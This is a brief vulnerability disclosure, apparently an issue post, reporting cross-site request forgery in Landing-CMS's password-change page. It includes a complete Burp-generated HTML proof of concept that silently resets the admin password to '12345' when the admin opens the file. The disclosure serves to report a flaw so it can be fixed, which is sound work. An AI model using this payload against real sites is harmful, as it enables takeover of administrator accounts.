Landing-CMS
Landing-CMS copied to clipboard
Landing-CMS has Cross-site request forgery.
http://192.168.18.130/cms/password/
I can change the admin's password when admin click the csrf html file.
payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.18.130/cms/password/" method="POST">
<input type="hidden" name="pwd1" value="12345" />
<input type="hidden" name="pwd2" value="12345" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>